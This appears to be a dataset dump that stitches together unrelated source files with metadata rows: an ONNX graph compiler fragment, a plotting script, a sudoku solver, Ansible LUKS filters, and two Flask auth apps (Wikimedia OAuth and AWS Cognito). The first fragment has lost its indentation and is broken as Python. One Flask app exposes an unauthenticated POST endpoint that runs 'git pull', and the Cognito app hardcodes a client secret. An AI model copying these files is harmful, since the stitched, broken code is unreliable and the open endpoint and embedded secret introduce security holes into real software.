DiGraph is easier to use as a graph compared to GraphProto where use-def is implicit."""
ret_graph = nx.DiGraph()
onnx_defs, onnx_uses = def_use(graph.node)
node_shape = node_to_shape(graph)
node_and_attr = [(n, {"shape": shape}) for n, shape in node_shape.items()]
ret_graph.add_nodes_from(node_and_attr)
tensors = extract_tensors_from_graph(graph)
tensor_and_attr = [(t, {"shape": t.output_shape}) for t in tensors.values()]
ret_graph.add_nodes_from(tensor_and_attr)
for onnx_value_name, use_nodes in onnx_uses.items():
def_node = onnx_defs.get(onnx_value_name)
if def_node is None:
def_node = tensors[onnx_value_name]
for use_node, used_at_narg in use_nodes:
ret_graph.add_edge(def_node, use_node, index=used_at_narg)
return ret_graph
def _build_dfg(self, onnx_graph: nx.DiGraph) -> nx.DiGraph:
"""Translate _build_onnx_dfg output into DFGNode DFG.
        First run some passes to process subgraphs that need to be
        processed together, then each unprocessed node is translated into
        one or more nodes."""
# Gemm in tensor_runtime does reshape automatically
# it also doesn't have a dedicated reshape operator
onnx_graph = drop_reshape_before_gemm(onnx_graph)
# For each onnx node, generate our nodes
node_to_nodes, error_nodes = {}, []
for onnx_node in nx.topological_sort(onnx_graph):
our_nodes = self._emit_node(onnx_graph, onnx_node)
if our_nodes is None:
error_nodes.append(onnx_node)
else:
node_to_nodes[onnx_node] = our_nodes
if error_nodes:
error_repr = [f"{n.name}({n.op_type})" for n in error_nodes]
if len(error_nodes) > 10: # Magic number
raise ValueError(f"Unsupported operators (first 10): {error_repr[:10]}")
else:
raise ValueError(f"Unsupported operators: {error_repr}")
# Apply node_to_nodes replacement on onnx_graph to create a new DFG
return build_graph_with_mapping(onnx_graph, node_to_nodes)
def _dce_get_io_info(self):
inputs = [n for n in self.graph if isinstance(n, g.InputTensor)]
inputs_set = set(inputs)
reachables = set()
for component in nx.connected_components(self.graph.to_undirected()):
            # If any input goes into this subgraph, it is alive.
if set(component).intersection(inputs_set):
reachables.update(component)
unreachables = set(self.graph) - reachables
# Remove nodes unreachable from input
self.graph.remove_nodes_from(unreachables)
# Then outputs are nodes with out_degree = 0
outputs = [n for n in self.graph if self.graph.out_degree[n] == 0]
assert len(outputs) == 1
return inputs, outputs[0]
@staticmethod
def _emit_node(in_graph: nx.DiGraph, node: NodeT) -> Optional[EmitNodeT]:
output_shape = in_graph.nodes[node].get("shape")
predec = sorted_inputs(in_graph, node)
predec_shapes = [in_graph.nodes[n].get("shape") for n in predec]
if isinstance(node, g.DFGNode):
# Directly add node into return graph.
return node
attrs = node_attr_to_dict(node)
attrs["input_shapes"] = predec_shapes
attrs["output_shape"] = output_shape
if node.op_type == "Conv":
if not isinstance(predec[1], g.WeightTensor) or len(predec_shapes[1]) != 4:
return None # Only supports 2D conv with rhs being constant
# Only pass in the first 2 arguments' shapes
attrs["input_shapes"] = predec_shapes[:2]
conv_node = g.Conv2DNode(node.name, **attrs)
if len(predec) == 2:
return conv_node
# Split into conv followed by an addition
bias_node = g.BiasAddNode(
f"Bias_{node.name.split('_')[-1]}", [output_shape], output_shape
)
return MarkedSubGraph.idiomatic_1to2(conv_node, bias_node, predec)
if node.op_type in ("MatMul", "Gemm"):
attrs["input_shapes"] = predec_shapes[:2]
mul_node = g.MatMulNode(node.name, **attrs)
if node.op_type == "Gemm":
mul_node.gemm_transpose(predec)
if len(predec) == 2:
return mul_node
# Split into mul followed by an addition
bias_node = g.BiasAddNode(
f"Bias_{node.name.split('_')[-1]}", [output_shape], output_shape
)
return MarkedSubGraph.idiomatic_1to2(mul_node, bias_node, predec)
if node.op_type == "GlobalAveragePool":
input0_shape = in_graph.nodes[predec[0]]["shape"]
_, _, h, w = input0_shape
return g.AveragePool2DNode(
node.name, predec_shapes, output_shape, [1, 1], (h, w), [0, 0, 0, 0]
)
one_to_one_nodes = {
"MaxPool": g.MaxPool2DNode,
"AveragePool": g.AveragePool2DNode,
"Add": g.AddNode,
"Softmax": g.SoftMaxNode,
"Relu": g.ReluNode,
"Tanh": g.TanhNode,
"BatchNormalization": g.BatchNormalizationNode,
"Pad": g.PadNode,
"Identity": g.IdentityNode,
"Flatten": g.FlattenNode,
}
if node.op_type not in one_to_one_nodes:
return None
try:
return one_to_one_nodes[node.op_type](node.name, **attrs)
except (TypeError, KeyError, ValueError, RuntimeError):
node_class = one_to_one_nodes[node.op_type]
raise ValueError(f"Node ({node_class}) creation failed")
def def_use(nodes: Iterable) -> Tuple[dict, dict]:
"""Computes def/use relation from a list of node.
This method is duck-typed and operates on any node defining .input and .output.
"""
defs, uses = {}, defaultdict(list)
for n in nodes:
for i, input_ in enumerate(n.input):
uses[input_].append((n, i))
for output in n.output:
defs[output] = n
return defs, uses
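# Illustrative example (hypothetical duck-typed nodes, not real ONNX protos):
#   from collections import namedtuple
#   FakeNode = namedtuple("FakeNode", ["input", "output"])
#   a = FakeNode(input=["x"], output=["t"])
#   b = FakeNode(input=["t", "w"], output=["y"])
#   defs, uses = def_use([a, b])
#   # defs == {"t": a, "y": b}
#   # uses["t"] == [(b, 0)]  (node b consumes tensor "t" as its 0th input)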
def drop_reshape_before_gemm(graph: nx.DiGraph) -> nx.DiGraph:
"""Look for a shape-gather-unsqueeze-concat-reshape chain and replace that with flatten."""
for node in list(graph.nodes):
if node.op_type != "Reshape":
continue
reshape_input, target_shape = sorted_inputs(graph, node)
if not isinstance(target_shape, g.WeightTensor): # Not constant shape, nope
continue
n_gemm = get_next_in_chain(graph, "Gemm", node)
if n_gemm is None:
continue
# Must be an (n-1)-d flatten before gemm
assert list(target_shape.input_data) == [1, -1]
# Connect input of reshape to gemm, then remove reshape
graph.add_edge(reshape_input, n_gemm, index=0)
graph.remove_node(node)
return graph
def get_next_in_chain(
graph: nx.DiGraph, type_: str, node: Optional[NodeT]
) -> Optional[NodeT]:
"""
Get a unique user node of the unique output of Node `node`,
and return it if it has Type `type_`.
"""
if node is None or len(node.output) != 1:
return None # Propagates None; Unique output
users = list(graph.neighbors(node))
if len(users) != 1 or users[0].op_type != type_:
return None # Unique user of the output; Correct type
return users[0]
def build_graph_with_mapping(
graph: nx.DiGraph, node_mapping: Dict[NodeT, EmitNodeT]
) -> nx.DiGraph:
graph = graph.copy()
single_node, multi_node = {}, {}
for replace_node, by_node in node_mapping.items():
if isinstance(by_node, g.DFGNode):
single_node[replace_node] = by_node
else:
multi_node[replace_node] = by_node
# We do one-to-many replacements first
# because their predecessors are specified as onnx nodes.
for replace_node, subgraph in multi_node.items():
# Add subgraph itself
graph = nx.compose(graph, subgraph.subgraph)
# Add in edges
graph.add_edges_from(subgraph.entry_edges)
# Add out edges
succ = graph.out_edges(replace_node, "index")
for _, to, index in succ:
graph.add_edge(subgraph.exit, to, index=index)
# Remove old node
graph.remove_node(replace_node)
# Then do all one-to-one replacements.
graph = nx.relabel_nodes(graph, single_node)
return graph
def extract_tensors_from_graph(onnx_graph: GraphT) -> Dict[str, g.TensorNode]:
tensors = {}
# parse weight
weight_cnt = 0
for weight_tensor in onnx_graph.initializer:
tensors[weight_tensor.name] = g.WeightTensor(
weight_tensor, f"weight_{weight_cnt}"
)
weight_cnt += 1
# parse input
input_cnt = 0
for input_ in onnx_graph.input:
if input_.name in tensors:
continue
tensors[input_.name] = g.InputTensor(
input_, get_node_shape(input_), f"input_{input_cnt}"
)
input_cnt += 1
return tensors
def sorted_inputs(graph: nx.DiGraph, node):
sorted_edges = sorted(graph.in_edges(node, "index"), key=lambda p: p[2])
return [e[0] for e in sorted_edges]
def draw_graph(graph: nx.DiGraph, output_to):
from networkx.drawing.nx_agraph import to_agraph
agraph = to_agraph(graph)
agraph.layout("dot")
agraph.draw(output_to)
| 39.519062
| 96
| 0.632755
| 9,257
| 0.686925
| 0
| 0
| 5,139
| 0.381345
| 0
| 0
| 3,559
| 0.264099
|
773a004602d8821b5d2db1868127d6d37b7dd480
| 4,435
|
py
|
Python
|
analysis/plotting/multi_sites.py
|
jm9e/FL_Pipeline
|
d9a8c3d3511817418d908b7a94ccd049c60b7b5d
|
[
"Apache-2.0"
] | null | null | null |
analysis/plotting/multi_sites.py
|
jm9e/FL_Pipeline
|
d9a8c3d3511817418d908b7a94ccd049c60b7b5d
|
[
"Apache-2.0"
] | null | null | null |
analysis/plotting/multi_sites.py
|
jm9e/FL_Pipeline
|
d9a8c3d3511817418d908b7a94ccd049c60b7b5d
|
[
"Apache-2.0"
] | null | null | null |
import csv
import json
import matplotlib.pyplot as plt
import numpy as np
if __name__ == '__main__':
formats = ['png', 'pdf', 'svg', 'eps']
metrics = [
{'gmetric': 'groc', 'lmetric': 'lroc', 'metric': 'AUC'},
{'gmetric': 'gauc', 'lmetric': 'lauc', 'metric': 'PRAUC'},
]
datasets = [
{'name': 'HCC', 'file': '../../results/evaluation/hcc_multi_sites_100_each.csv'},
{'name': 'ILPD', 'file': '../../results/evaluation/ilpd_multi_sites_100_each.csv'},
{'name': 'LTD', 'file': '../../results/evaluation/tumor_multi_sites_100_each.csv'},
{'name': 'BCD', 'file': '../../results/evaluation/diag_multi_sites_100_each.csv'},
]
for metric in metrics:
gmetric = metric['gmetric']
lmetric = metric['lmetric']
metric = metric['metric']
for ds in datasets:
file = ds['file']
name = ds['name']
title = f'{name} | Multiple Local Models'
stats = {}
xs = ['1', '2', '5', '10', '20', '50', '100']
with open(file, newline='') as csvfile:
data = csv.reader(csvfile, delimiter=';')
headers = next(data)
gauc_idx = headers.index(gmetric)
lauc_idx = headers.index(lmetric)
for row in data:
stat = stats.get(row[1])
if not stat:
stat = {
gmetric: [],
lmetric: [],
}
stats[row[1]] = stat
# xs.append(row[1])
gvals = json.loads(row[gauc_idx])
lvals = json.loads(row[lauc_idx])
stat[gmetric].append(gvals)
if len(lvals) > 0:
stat[lmetric].extend(lvals)
else:
stat[lmetric].append(gvals)
# datainfo = str(len(stats['100'][gmetric]))
# title += ' | ' + datainfo
y_gauc_median = [np.median(stats[x][gmetric]) for x in xs]
y_gauc_q25 = [np.quantile(stats[x][gmetric], 0.25) for x in xs]
y_gauc_q75 = [np.quantile(stats[x][gmetric], 0.75) for x in xs]
y_lauc_median = [np.median(stats[x][lmetric]) for x in xs]
y_lauc_q25 = [np.quantile(stats[x][lmetric], 0.25) for x in xs]
y_lauc_q75 = [np.quantile(stats[x][lmetric], 0.75) for x in xs]
xs = [int(x) for x in xs]
regular_col = '#b0b0b0'
global_col = '#424ef5'
local_col = '#f57542'
alpha_mean = 1.0
alpha_q = 0.25
alpha_area = 0.2
fig = plt.figure(figsize=(6, 4.5))
ax = fig.add_subplot()
ax.hlines(y_gauc_q25[0], 1, 100, linestyles='dotted', colors=[regular_col])
ax.hlines(y_gauc_median[0], 1, 100, label='Centralized', colors=[regular_col])
ax.hlines(y_gauc_q75[0], 1, 100, linestyles='dotted', colors=[regular_col])
ax.fill_between(xs, y_gauc_q25, y_gauc_median, color=global_col, alpha=alpha_area)
ax.fill_between(xs, y_gauc_q75, y_gauc_median, color=global_col, alpha=alpha_area)
ax.fill_between(xs, y_lauc_q25, y_lauc_median, color=local_col, alpha=alpha_area)
ax.fill_between(xs, y_lauc_q75, y_lauc_median, color=local_col, alpha=alpha_area)
ax.plot(xs, y_gauc_q25, '_', color=global_col, alpha=alpha_q)
ax.plot(xs, y_gauc_median, '.', label='Combined', color=global_col, alpha=alpha_mean)
ax.plot(xs, y_gauc_q75, '_', color=global_col, alpha=alpha_q)
ax.plot(xs, y_lauc_q25, '_', color=local_col, alpha=alpha_q)
ax.plot(xs, y_lauc_median, '.', label='Local', color=local_col, alpha=alpha_mean)
ax.plot(xs, y_lauc_q75, '_', color=local_col, alpha=alpha_q)
plt.yticks([0.5, 0.6, 0.7, 0.8, 0.9, 1.0])
plt.xscale('log')
plt.xticks([1, 2, 5, 10, 20, 50, 100], ['Centralized', '2', '5', '10', '20', '50', '100'])
plt.ylabel(metric)
plt.xlabel('Number of Sites')
plt.legend()
plt.title(title)
for format in formats:
plt.savefig(f'../../results/plots/{name}_{metric}_sites.{format}', format=format, bbox_inches='tight')
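# Input format note (inferred from the parsing above; the paths are the ones
# hard-coded in `datasets`): each CSV is ';'-delimited with a header row, the
# second column holds the number of sites, and the 'groc'/'lroc' (or
# 'gauc'/'lauc') columns hold JSON-encoded lists of per-run scores for the
# combined and local models respectively.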
| 38.903509
| 118
| 0.521308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 812
| 0.183089
|
773a2176b2ba4a1a9a4e1bd585d65e2d15549d01
| 226
|
py
|
Python
|
HackerRank/CtCI/array_left_rotation.py
|
mahasak/Practice
|
7ed125087b977b034161157830b8e415d52b6ed7
|
[
"Unlicense"
] | null | null | null |
HackerRank/CtCI/array_left_rotation.py
|
mahasak/Practice
|
7ed125087b977b034161157830b8e415d52b6ed7
|
[
"Unlicense"
] | null | null | null |
HackerRank/CtCI/array_left_rotation.py
|
mahasak/Practice
|
7ed125087b977b034161157830b8e415d52b6ed7
|
[
"Unlicense"
] | null | null | null |
def array_left_rotation(a, n, k):
return a[k:] + a[0:k]
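# Example: array_left_rotation([1, 2, 3, 4, 5], 5, 2) == [3, 4, 5, 1, 2]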
n, k = map(int, input().strip().split(' '))
a = list(map(int, input().strip().split(' ')))
answer = array_left_rotation(a, n, k)
print(' '.join(map(str, answer)))
| 25.111111
| 47
| 0.610619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 9
| 0.039823
|
773a351110e170920b1633be885fbe44c1c4b850
| 4,127
|
py
|
Python
|
examples/sudoku/sudoku_cores.py
|
SRI-CSL/yices2_python_bindings
|
ff48993b6f620605afce12741f9afede94238627
|
[
"MIT"
] | 8
|
2018-09-19T00:42:45.000Z
|
2022-03-25T12:22:01.000Z
|
examples/sudoku/sudoku_cores.py
|
SRI-CSL/yices2_python_bindings
|
ff48993b6f620605afce12741f9afede94238627
|
[
"MIT"
] | 4
|
2020-06-05T21:44:14.000Z
|
2021-12-06T17:24:31.000Z
|
examples/sudoku/sudoku_cores.py
|
SRI-CSL/yices2_python_bindings
|
ff48993b6f620605afce12741f9afede94238627
|
[
"MIT"
] | 3
|
2020-07-10T18:15:01.000Z
|
2020-12-16T09:50:02.000Z
|
#!/usr/bin/env python
"""Using unsat cores to give hints."""
from SudokuLib import Puzzle
from Solver import Solver
from yices.Yices import Yices
from yices.Census import Census
puzzle_blank = [
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],
#
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],
#
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],
]
puzzle_1 = [
[ 0, 6, 0, 0, 0, 8, 0, 7, 3],
[ 0, 0, 2, 0, 0, 0, 0, 4, 0],
[ 5, 0, 0, 0, 6, 0, 0, 0, 0],
#
[ 0, 0, 0, 6, 0, 2, 0, 0, 5],
[ 0, 0, 4, 0, 0, 0, 1, 0, 0],
[ 6, 0, 0, 8, 0, 7, 0, 0, 0],
#
[ 0, 0, 0, 0, 7, 0, 0, 0, 1],
[ 0, 5, 0, 0, 0, 0, 3, 0, 0],
[ 4, 3, 0, 1, 0, 0, 0, 8, 0],
]
# puzzle_ai_escargot comes from here:
# https://puzzling.stackexchange.com/questions/29/what-are-the-criteria-for-determining-the-difficulty-of-sudoku-puzzle
# where it is claimed to be the "hardest sudoku in the world",
# but in fact it is not a valid sudoku since it has more than one solution. Tut tut.
# I added it to one of the predefined boards ('escargot') of SudokuSensei and
# it has 29 non-isomorphic models (aka solutions).
puzzle_ai_escargot = [
[ 1, 0, 0, 0, 0, 7, 0, 9, 0],
[ 0, 3, 0, 0, 2, 0, 0, 0, 8],
[ 0, 0, 9, 6, 0, 0, 5, 0, 0],
#
[ 0, 0, 5, 3, 0, 0, 9, 0, 0],
[ 0, 1, 0, 0, 8, 0, 0, 0, 2],
[ 6, 0, 0, 0, 0, 4, 0, 0, 0],
#
[ 3, 0, 0, 0, 0, 0, 0, 1, 0],
[ 0, 4, 0, 0, 0, 0, 0, 0, 7],
[ 0, 0, 7, 0, 0, 0, 0, 3, 0],
]
extreme_1 = [
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 2, 0, 0, 7, 1, 5, 0],
[ 4, 0, 0, 0, 0, 9, 3, 0, 6],
#
[ 0, 1, 0, 0, 0, 3, 0, 0, 5],
[ 0, 0, 0, 5, 2, 4, 0, 0, 0],
[ 3, 0, 0, 7, 0, 0, 0, 6, 0],
#
[ 1, 0, 7, 6, 0, 0, 0, 0, 9],
[ 0, 5, 6, 8, 0, 0, 4, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0, 0],
]
extreme_2 = [
[ 0, 0, 0, 0, 0, 0, 7, 0, 3],
[ 0, 0, 6, 0, 0, 8, 5, 4, 0],
[ 5, 0, 0, 0, 7, 0, 0, 0, 0],
#
[ 0, 1, 9, 0, 0, 4, 8, 0, 0],
[ 7, 0, 0, 0, 0, 0, 0, 0, 9],
[ 0, 0, 8, 9, 0, 0, 2, 1, 0],
#
[ 0, 0, 0, 0, 5, 0, 0, 0, 2],
[ 0, 5, 7, 3, 0, 0, 1, 0, 0],
[ 4, 0, 3, 0, 0, 0, 0, 0, 0],
]
extreme_3 = [
[ 8, 0, 1, 0, 9, 0, 0, 0, 0],
[ 0, 7, 2, 0, 0, 1, 0, 0, 0],
[ 0, 0, 0, 3, 0, 0, 8, 0, 0],
#
[ 5, 0, 0, 1, 0, 0, 0, 4, 0],
[ 1, 0, 0, 0, 3, 0, 0, 0, 9],
[ 0, 2, 0, 0, 0, 7, 0, 0, 5],
#
[ 0, 0, 5, 0, 0, 2, 0, 0, 0],
[ 0, 0, 0, 4, 0, 0, 5, 9, 0],
[ 0, 0, 0, 0, 8, 0, 4, 0, 3],
]
extreme_4 = [
[ 7, 0, 0, 0, 0, 4, 0, 5, 0],
[ 0, 0, 0, 5, 0, 0, 1, 0, 0],
[ 0, 0, 0, 0, 0, 6, 0, 7, 8],
#
[ 0, 0, 4, 0, 0, 0, 8, 0, 0],
[ 3, 5, 0, 0, 8, 0, 0, 1, 9],
[ 0, 0, 8, 0, 0, 0, 2, 0, 0],
#
[ 5, 4, 0, 1, 0, 0, 0, 0, 0],
[ 0, 0, 6, 0, 0, 5, 0, 0, 0],
[ 0, 8, 0, 9, 0, 0, 0, 0, 1],
]
#https://www.conceptispuzzles.com/index.aspx?uri=info/article/424
hardest = [
[ 8, 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 3, 6, 0, 0, 0, 0, 0],
[ 0, 7, 0, 0, 9, 0, 2, 0, 0],
#
[ 0, 5, 0, 0, 0, 7, 0, 0, 0],
[ 0, 0, 0, 0, 4, 5, 7, 0, 0],
[ 0, 0, 0, 1, 0, 0, 0, 3, 0],
#
[ 0, 0, 1, 0, 0, 0, 0, 6, 8],
[ 0, 0, 8, 5, 0, 0, 0, 1, 0],
[ 0, 9, 0, 0, 0, 0, 4, 0, 0],
]
def analyze(rawpuzzle, name):
puzzle = Puzzle(rawpuzzle)
print(f'\nPuzzle ({name}):\n')
puzzle.pprint()
solver = Solver(puzzle)
solution = solver.solve()
if solution is not None:
print(f'\nSolution ({name}):\n')
solution.pprint()
#<experimental zone>
simplest = solver.filter_cores(solution)
if simplest is not None:
solver.show_hints(simplest)
#</experimental zone>
def main():
analyze(puzzle_1, "evil")
analyze(extreme_1, "extreme #1")
analyze(extreme_2, "extreme #2")
analyze(extreme_3, "extreme #3")
analyze(extreme_4, "extreme #4")
analyze(hardest, "hardest")
if __name__ == '__main__':
main()
print(Census.dump())
Yices.exit(True)
| 24.565476
| 119
| 0.414587
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 716
| 0.173492
|
773b69ca25c1ef12c8384954c0ed9f9b031bb82b
| 2,715
|
py
|
Python
|
www/python/src/app.py
|
Destokado/funpedia
|
d864ac15c5ed9983d9a1373fad364d2f0ffc66fc
|
[
"MIT"
] | null | null | null |
www/python/src/app.py
|
Destokado/funpedia
|
d864ac15c5ed9983d9a1373fad364d2f0ffc66fc
|
[
"MIT"
] | null | null | null |
www/python/src/app.py
|
Destokado/funpedia
|
d864ac15c5ed9983d9a1373fad364d2f0ffc66fc
|
[
"MIT"
] | null | null | null |
import os
import flask
import mwoauth
import yaml
from flask import request, Response
app = flask.Flask(__name__)
# Load configuration from YAML file
__dir__ = os.path.dirname(__file__)
app.config.update(
yaml.safe_load(open(os.path.join(__dir__, 'config.yaml'))))
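# The YAML config is expected to define at least the keys read below
# (CONSUMER_KEY, CONSUMER_SECRET, OAUTH_MWURI); a sketch with placeholder values:
#   CONSUMER_KEY: "abc123"
#   CONSUMER_SECRET: "def456"
#   OAUTH_MWURI: "https://meta.wikimedia.org/w/index.php"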
if __name__ == '__main__':
    # Flask exposes `run`, not `run_server`. Under a WSGI server (as on
    # Toolforge) this block is never executed; if run directly, note that it
    # blocks here before the routes below are registered.
    app.run(host='0.0.0.0', threaded=True, debug=True)
####APP.ROUTE####
@app.route('/login/')
def login():
"""Initiate an OAuth login.
Call the MediaWiki server to get request secrets and then redirect the
user to the MediaWiki server to sign the request.
"""
consumer_token = mwoauth.ConsumerToken(
app.config['CONSUMER_KEY'], app.config['CONSUMER_SECRET'])
try:
redirect, request_token = mwoauth.initiate(
app.config['OAUTH_MWURI'], consumer_token)
except Exception:
app.logger.exception('mwoauth.initiate failed')
return flask.redirect(flask.url_for('index'))
else:
flask.session['request_token'] = dict(zip(
request_token._fields, request_token))
return flask.redirect(redirect)
@app.route('/oauth-callback/')
def oauth_callback():
"""OAuth handshake callback."""
if 'request_token' not in flask.session:
flask.flash(u'OAuth callback failed. Are cookies disabled?')
return flask.redirect(flask.url_for('index'))
consumer_token = mwoauth.ConsumerToken(
app.config['CONSUMER_KEY'], app.config['CONSUMER_SECRET'])
try:
access_token = mwoauth.complete(
app.config['OAUTH_MWURI'],
consumer_token,
mwoauth.RequestToken(**flask.session['request_token']),
flask.request.query_string)
identity = mwoauth.identify(
app.config['OAUTH_MWURI'], consumer_token, access_token)
except Exception:
app.logger.exception('OAuth authentication failed')
else:
flask.session['access_token'] = dict(zip(
access_token._fields, access_token))
flask.session['username'] = identity['username']
return flask.redirect(flask.url_for('index'))
@app.route('/logout/')
def logout():
"""Log the user out by clearing their session."""
flask.session.clear()
return flask.redirect(flask.url_for('index'))
@app.route('/git-pull/', methods=['POST'])
def respond():
    print(request.json)
os.system('git pull')
return Response(status=200)
@app.errorhandler(404)
def handling_page_not_found(e):
return "<h1>404</h1><p>The resource could not be found.</p>", 404
# APPS
from view.home import *
from view.editing_buddy_app import *
from view.storytelling_app import *
from view.duel_app import *
# Others
from view.layouts import *
| 27.989691
| 74
| 0.673665
| 0
| 0
| 0
| 0
| 2,150
| 0.791897
| 0
| 0
| 774
| 0.285083
|
773e5f3762c89c880f8d622fb33299a5f198d29d
| 130
|
bzl
|
Python
|
test/external_repo/repo.bzl
|
Vertexwahn/depend_on_what_you_use
|
480732677a74fb7033848004d4d5015af0ad36c5
|
[
"MIT"
] | null | null | null |
test/external_repo/repo.bzl
|
Vertexwahn/depend_on_what_you_use
|
480732677a74fb7033848004d4d5015af0ad36c5
|
[
"MIT"
] | null | null | null |
test/external_repo/repo.bzl
|
Vertexwahn/depend_on_what_you_use
|
480732677a74fb7033848004d4d5015af0ad36c5
|
[
"MIT"
] | null | null | null |
def load_external_repo():
native.local_repository(
name = "ext_repo",
path = "test/external_repo/repo",
)
| 21.666667
| 41
| 0.615385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 35
| 0.269231
|
77401bdbe34d3710ff102d672087cc5c7146f27e
| 1,817
|
py
|
Python
|
filter_plugins/general.py
|
stackhpc/ansible-role-luks
|
8c4b5f472ab0aef3d2a776d4fcd37ca17c6eac05
|
[
"Apache-1.1"
] | 3
|
2020-04-14T19:57:25.000Z
|
2021-01-11T09:09:16.000Z
|
filter_plugins/general.py
|
stackhpc/ansible-role-luks
|
8c4b5f472ab0aef3d2a776d4fcd37ca17c6eac05
|
[
"Apache-1.1"
] | 4
|
2020-08-12T10:24:25.000Z
|
2022-01-17T17:48:28.000Z
|
filter_plugins/general.py
|
stackhpc/ansible-role-luks
|
8c4b5f472ab0aef3d2a776d4fcd37ca17c6eac05
|
[
"Apache-1.1"
] | 2
|
2021-06-17T21:57:42.000Z
|
2022-02-20T08:02:43.000Z
|
# Copyright (c) 2020 StackHPC Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
from ansible import errors
import jinja2
def _get_hostvar(context, var_name, inventory_hostname=None):
if inventory_hostname is None:
namespace = context
else:
if inventory_hostname not in context['hostvars']:
raise errors.AnsibleFilterError(
"Inventory hostname '%s' not in hostvars" % inventory_hostname)
namespace = context["hostvars"][inventory_hostname]
return namespace.get(var_name)
@jinja2.contextfilter
def luks_mode(context, device):
"""Returns a string represent the mode"""
if "mode" in device:
return device["mode"]
return "keyfile"
@jinja2.contextfilter
def luks_key(context, device):
"""Returns name of keyfile"""
return device["device"].replace('/', '-')[1:]
@jinja2.contextfilter
def luks_keypath(context, device):
"""Returns full path to keyfile"""
directory = _get_hostvar(context, "luks_keys_path")
key = luks_key(context, device)
return os.path.join(directory, key)
class FilterModule(object):
"""Utility filters."""
def filters(self):
return {
'luks_mode': luks_mode,
'luks_key': luks_key,
'luks_keypath': luks_keypath,
}
| 28.84127
| 79
| 0.690149
| 217
| 0.119428
| 0
| 0
| 538
| 0.296092
| 0
| 0
| 842
| 0.463401
|
77415032b1eca6d95f7e905db147fe61fa6860f9
| 3,864
|
py
|
Python
|
aws-dev/awsdev8/flaskstart.py
|
PacktPublishing/-AWS-Certified-Developer---Associate-Certification
|
3f76e3d3df6797705b5b30ae574fe678250d5e92
|
[
"MIT"
] | 13
|
2020-02-02T13:53:50.000Z
|
2022-03-20T19:50:02.000Z
|
aws-dev/awsdev8/flaskstart.py
|
PacktPublishing/-AWS-Certified-Developer---Associate-Certification
|
3f76e3d3df6797705b5b30ae574fe678250d5e92
|
[
"MIT"
] | 2
|
2020-03-29T19:08:04.000Z
|
2021-06-02T00:57:44.000Z
|
aws-dev/awsdev8/flaskstart.py
|
PacktPublishing/-AWS-Certified-Developer---Associate-Certification
|
3f76e3d3df6797705b5b30ae574fe678250d5e92
|
[
"MIT"
] | 10
|
2019-12-25T20:42:37.000Z
|
2021-11-17T15:19:00.000Z
|
#!/usr/bin/env python
from flask import Flask, request,Response
import logging
import os
import json
import cognitoHelper as cog
#logging config
logging.basicConfig(format='%(asctime)s %(levelname)-8s %(message)s',level=logging.INFO,datefmt='%Y-%m-%d %H:%M:%S')
logger = logging.getLogger(__name__)
#globals
MODULE = "section8"
HOST = "0.0.0.0"
PORT = "8080"
PROFILE = "aws-dev"
REGION = "eu-west-2"
PROFILE = "aws-dev"
REGION = "eu-west-2"
COGNITO_CLIENT_ID = "5br85tkg2nmq8nn1v8pk71lkku"
COGNITO_CLIENT_SECRET = "nvob2gmc5qcgak315fncnuau5a25vumhicc8s1m62gkn4q2m4gs"
USER_POOL = "my-app-pool"
#initialise flask
app = Flask(__name__)
app.secret_key = os.urandom(24)
cidp = cog.create_client(REGION)
@app.route('/api/<string:version>/auth/login',methods=["POST"])
def loginUser(version):
result = {}
headers = {}
username = request.authorization.username
password = request.authorization.password
authObject = cog.login(cidp,username,password,USER_POOL)
if 'error' in authObject:
if 'User is disabled' in str(authObject['error']):
result['error'] = "user disabled"
else:
result['error'] = str(authObject['error'])
status = 401
result['result'] = 'fail'
else:
result['result'] = "ok"
result['data'] = authObject['AuthenticationResult']
status = 200
lresponse = Response(json.dumps(result), status=status, mimetype='application/json',headers=headers)
if status == 200:
lresponse.set_cookie("idtoken",authObject['AuthenticationResult']['IdToken'],httponly=True,expires=None)
return lresponse
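# Example request sketch (hypothetical host/port and credentials; the route
# takes the Cognito username/password via HTTP Basic auth):
#   curl -X POST -u alice:Passw0rd1 http://localhost:8080/api/v1/auth/login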
@app.route('/api/<string:version>/content/warranty',methods=["POST"])
def secure(version):
resource_path = request.path
result = {}
headers = {}
idtoken = request.cookies.get("idtoken")
if request.args.get('accesstoken'):
access_token = request.args.get('accesstoken')
try:
tokenObject = cog.decode_cognito_token(access_token)
except Exception as e:
status = 500
result['error'] = str(e)
else:
if 'error' in tokenObject:
result['error'] = tokenObject['error']
status = 403
result['result'] = 'fail'
else:
found = 0
if str(tokenObject['data']['scope']).find(resource_path) == 0:
found = 1
if found == 1:
result['result'] = "ok"
result['data'] = tokenObject['data']
status = 200
else:
status = 403
result['resource'] = resource_path
result['result'] = 'fail'
result['error'] = "Not in scope, scope=" + tokenObject['data']['scope']
else:
result['error'] = "no accesstoken specified"
status = 400
result['result'] = 'fail'
lresponse = Response(json.dumps(result), status=status, mimetype='application/json', headers=headers)
return lresponse
@app.route('/api/<string:version>/auth/whoami',methods=["POST"])
def whoami(version):
result = {}
headers = {}
idtoken = request.cookies.get("idtoken")
tokenObject = cog.decode_cognito_token(idtoken)
if 'error' in tokenObject:
result['error'] = tokenObject['error']
status = 401
result['result'] = 'fail'
else:
result['result'] = "ok"
result['data'] = tokenObject
status = 200
